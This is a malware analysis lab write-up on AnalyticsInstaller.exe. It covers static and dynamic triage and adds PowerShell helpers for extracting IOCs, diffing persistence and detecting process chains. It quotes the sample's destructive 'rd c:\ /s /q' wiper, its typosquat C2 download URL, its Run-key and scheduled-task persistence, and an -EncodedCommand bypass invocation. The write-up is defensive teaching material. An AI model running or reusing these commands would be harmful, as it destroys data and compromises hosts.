Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe
Triaged AnalyticsInstaller.exe with a static-then-dynamic workflow: hashed it with Get-FileHash (SHA256 D501EF28...), ran Sysinternals Strings to surface IOCs (www1-google-analytics.com:8088/analytics.exe, an HKCU Run key, a base64 -EncodedCommand PowerShell payload, and a destructive AnalyticsBackup.bat containing 'cmd.exe /c rd c:\ /s /q'), then detonated it under Regshot and Process Monitor. The Regshot diff caught a new Schedule\TaskCache\Tree\Analytics Backup key, Get-ScheduledTask confirmed the 'Analytics Backup' task, and Procmon's process tree showed the installer spawning cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand.
Commands
1. Hash the sample
Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.
Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe
Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe
2. Pull readable strings
Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.
C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe
3. Read the IOCs from the strings
The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.
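The sort of triage the strings pass invites is mechanical, so here is an added PowerShell helper (not from the lab or its tooling) that pulls the IOC shapes seen above out of strings.exe output and decodes any -EncodedCommand blob offline with [Convert], without ever running it. The sample lines are constructed to mirror the lab's findings; the encoded blob is built from a harmless placeholder script rather than reproducing the real JABt... payload, so the block runs stand-alone.

```powershell
# Added example (not from the lab): scan strings.exe output for URLs, paths,
# Run-key fragments and -EncodedCommand blobs, then decode the blobs offline.

# --- Constructed sample of strings.exe -n 10 output. The blob is generated from a
#     placeholder script here so the example is self-contained and harmless.
$placeholderScript = "Write-Output 'constructed placeholder payload'"
$placeholderBlob   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($placeholderScript))

$sampleStrings = @(
    'http://www1-google-analytics.com:8088/analytics.exe',
    'C:\Windows\System32\analytics.exe',
    'Software\Microsoft\Windows\CurrentVersion\Run',
    'C:\Windows\System32\AnalyticsBackup.bat',
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand $placeholderBlob",
    'cmd.exe /c start /max http://www.midnitemeerkats.com/note',
    'RegSetValueExW'
)

function Get-StringIocs {
    param([string[]]$Lines)
    $iocs = [ordered]@{ Urls = @(); Paths = @(); RegistryKeys = @(); EncodedCommands = @() }
    foreach ($line in $Lines) {
        # URLs, including non-standard ports such as :8088
        foreach ($m in [regex]::Matches($line, 'https?://[^\s"''<>]+')) { $iocs.Urls += $m.Value }
        # Absolute Windows file paths (drop / persistence locations)
        foreach ($m in [regex]::Matches($line, '[A-Za-z]:\\[^\s"''<>]+')) { $iocs.Paths += $m.Value }
        # Run / RunOnce persistence key fragments
        if ($line -match '(?i)CurrentVersion\\Run(Once)?') { $iocs.RegistryKeys += $line }
        # -EncodedCommand (also the -enc / -e short forms) followed by a base64 blob
        if ($line -match '(?i)-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
            $iocs.EncodedCommands += $Matches[3]
        }
    }
    return $iocs
}

function ConvertFrom-EncodedCommand {
    param([string]$Blob)
    # -EncodedCommand is base64 over UTF-16LE text, not UTF-8, so decode with Unicode
    $bytes = [Convert]::FromBase64String($Blob)
    return [Text.Encoding]::Unicode.GetString($bytes)
}

$found = Get-StringIocs -Lines $sampleStrings
"URLs:";          $found.Urls
"Paths:";         $found.Paths
"Registry keys:"; $found.RegistryKeys
foreach ($blob in $found.EncodedCommands) {
    "Decoded -EncodedCommand: " + (ConvertFrom-EncodedCommand -Blob $blob)
}
```

To use it on a real sample, replace $sampleStrings with the output of strings.exe (for example `$lines = & 'C:\tools\Sysinternals\strings.exe' -n 10 .\AnalyticsInstaller.exe`) and inspect the decoded text in a viewer, never by invoking it.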
4. Regshot first shot
Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.
5. Detonate and confirm the scheduled task
Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.
.\AnalyticsInstaller.exe
Get-ScheduledTask
6. Regshot second shot
Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.
7. Compare the snapshots
Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.
8. Read the Regshot diff report
Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task, confirmed independently of Get-ScheduledTask. The report also listed deleted keys and values from normal Windows churn (WER TermReason entries), the kind of noise a responder learns to ignore.
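Steps 4 to 8 are a before/after diff of persistence state, which is easy to script for the two locations this sample touched. The following PowerShell is an added example, not part of the lab or of Regshot: it snapshots scheduled tasks and the HKCU/HKLM Run and RunOnce values into a flat list, and diffs two snapshots with Compare-Object. The snapshot line format is my own, and the before/after data at the bottom is constructed to resemble what the lab observed (the defrag task, OneDrive Run value and non-installer details are made up).

```powershell
# Added example (not from the lab): a scoped PowerShell analogue of the Regshot
# first-shot / second-shot / compare workflow. Requires the ScheduledTasks module
# (Windows 8 / Server 2012 and later).

function Get-PersistenceSnapshot {
    # Scheduled tasks: path, name and the executables of their actions
    $tasks = Get-ScheduledTask | ForEach-Object {
        "TASK|$($_.TaskPath)$($_.TaskName)|$($_.Actions.Execute -join ' ')"
    }
    # Run / RunOnce values for the current user and the machine
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $run = foreach ($key in $runKeys) {
        if (Test-Path $key) {
            $props = Get-ItemProperty -Path $key
            foreach ($p in $props.PSObject.Properties) {
                # Skip the PS* metadata properties Get-ItemProperty adds
                if ($p.Name -notmatch '^PS') { "RUN|$key\$($p.Name)|$($p.Value)" }
            }
        }
    }
    return @($tasks) + @($run)
}

function Compare-PersistenceSnapshot {
    param([string[]]$Before, [string[]]$After)
    $diff = Compare-Object -ReferenceObject $Before -DifferenceObject $After
    [pscustomobject]@{
        Added   = @($diff | Where-Object SideIndicator -eq '=>' | ForEach-Object InputObject)
        Removed = @($diff | Where-Object SideIndicator -eq '<=' | ForEach-Object InputObject)
    }
}

# --- Constructed before/after snapshots modelled on the lab's findings ---
$before = @(
    'TASK|\Microsoft\Windows\Defrag\ScheduledDefrag|%windir%\system32\defrag.exe',
    'RUN|HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive|C:\Users\analyst\AppData\Local\Microsoft\OneDrive\OneDrive.exe'
)
$after = $before + @(
    'TASK|\Analytics Backup|C:\Windows\System32\AnalyticsBackup.bat',
    'RUN|HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Analytics Client|C:\Windows\System32\analytics.exe'
)
$result = Compare-PersistenceSnapshot -Before $before -After $after
"Added persistence entries:"
$result.Added
"Removed entries:"
$result.Removed

# Live use on the analysis VM:
#   $b = Get-PersistenceSnapshot
#   ... detonate the sample ...
#   $a = Get-PersistenceSnapshot
#   Compare-PersistenceSnapshot -Before $b -After $a
```

Unlike Regshot this does not cover the whole registry, so it is a complement for quick checks, not a replacement: Regshot is what surfaces the TaskCache\Tree, Plain and Tasks GUID entries the task scheduler writes beneath the task itself.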
9. Read the dropped batch payload
Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat. Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive (/s), quiet (/q) delete of the C: drive with no confirmation prompt. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.
Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat
10. Filter Process Monitor
Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.
11. Re-detonate under Procmon
Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.
.\AnalyticsInstaller.exe
12. Find the Process Create event
Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.
13. Read the encoded PowerShell command line
The Process Create event properties revealed the child: C:\WINDOWS\SysWOW64\cmd.exe launching cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes base64 so the real script never appears in plaintext on the command line, and -ExecutionPolicy Bypass sidesteps script restrictions. This is the runtime confirmation of the encoded blob seen statically in the strings.
14. Reconstruct the process tree
Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer, started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.
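The lineage in steps 13 and 14 is what a detection rule keys on, so here is an added PowerShell example (not from the lab or from Procmon) that rebuilds a process tree from flat process records and flags a cmd.exe parent spawning powershell.exe with -EncodedCommand. The records are constructed to mirror the lab's tree; only the installer's PID 5804 comes from the lab, the other PIDs and the <blob> placeholder are made up. The same functions work on Get-CimInstance Win32_Process output or a Procmon CSV export if the columns are mapped to ProcessId, ParentProcessId, Name and CommandLine.

```powershell
# Added example (not from the lab): reconstruct process ancestry and flag the
# cmd.exe -> powershell.exe -EncodedCommand chain seen in the lab.

# --- Constructed Process Create records modelled on the lab's process tree ---
$events = @(
    [pscustomobject]@{ ProcessId = 4120; ParentProcessId = 1500; Name = 'explorer.exe';           CommandLine = 'C:\Windows\explorer.exe' },
    [pscustomobject]@{ ProcessId = 4788; ParentProcessId = 4120; Name = 'powershell.exe';         CommandLine = 'powershell.exe' },
    [pscustomobject]@{ ProcessId = 5804; ParentProcessId = 4788; Name = 'AnalyticsInstaller.exe'; CommandLine = '.\AnalyticsInstaller.exe' },
    [pscustomobject]@{ ProcessId = 6012; ParentProcessId = 5804; Name = 'cmd.exe';                CommandLine = 'cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand <blob>' },
    [pscustomobject]@{ ProcessId = 6040; ParentProcessId = 6012; Name = 'powershell.exe';         CommandLine = 'powershell.exe -ExecutionPolicy Bypass -EncodedCommand <blob>' }
)

function Get-ProcessAncestry {
    param([object[]]$Procs, [int]$ProcessId)
    # Index by PID, then walk ParentProcessId upward until the parent is unknown
    $byId = @{}
    foreach ($p in $Procs) { $byId[$p.ProcessId] = $p }
    $chain = @()
    $cur = $byId[$ProcessId]
    while ($null -ne $cur) {
        $chain = ,$cur + $chain          # prepend so the root comes first
        $cur = $byId[$cur.ParentProcessId]
    }
    return $chain
}

function Test-EncodedPowerShellChain {
    param([object[]]$Chain)
    # True when cmd.exe directly spawns powershell.exe carrying -EncodedCommand
    # (or the -enc / -e short forms) anywhere in the ancestry
    for ($i = 1; $i -lt $Chain.Count; $i++) {
        $parent = $Chain[$i - 1]
        $child  = $Chain[$i]
        if ($parent.Name -ieq 'cmd.exe' -and $child.Name -ieq 'powershell.exe' -and
            $child.CommandLine -match '(?i)-e(nc(odedcommand)?)?\s') {
            return $true
        }
    }
    return $false
}

$chain = Get-ProcessAncestry -Procs $events -ProcessId 6040
"Lineage: " + (($chain | ForEach-Object { "$($_.Name)($($_.ProcessId))" }) -join ' -> ')
"Encoded PowerShell chain present: " + (Test-EncodedPowerShellChain -Chain $chain)

# Live use: $procs = Get-CimInstance Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine
```

On a live system PIDs are reused, so an ancestry built from a point-in-time Win32_Process query can splice unrelated processes together; Procmon's Process Tree and EDR telemetry avoid that by recording creation events with timestamps, which is why the lab's step 14 view is the authoritative one.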
Key Findings
- SHA256 D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45 (MD5 5524BDF546472FD66D3450C39CC4E2E5)
- C2 / payload URL: http://www1-google-analytics.com:8088/analytics.exe (Google Analytics typosquat)
- Persistence: HKCU/HKLM ...\CurrentVersion\Run 'Analytics Client' and an 'Analytics Backup' scheduled task
- Dropped wiper: AnalyticsBackup.bat containing cmd.exe /c rd c:\ /s /q
- Runtime: AnalyticsInstaller.exe → cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand
Security Controls
- Application control / WDAC to block unsigned binaries from user-writable paths
- PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
- Scheduled-task and Run-key baselining with alerting on new entries
- EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
- Egress filtering and DNS monitoring for typosquatted analytics domains
- Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload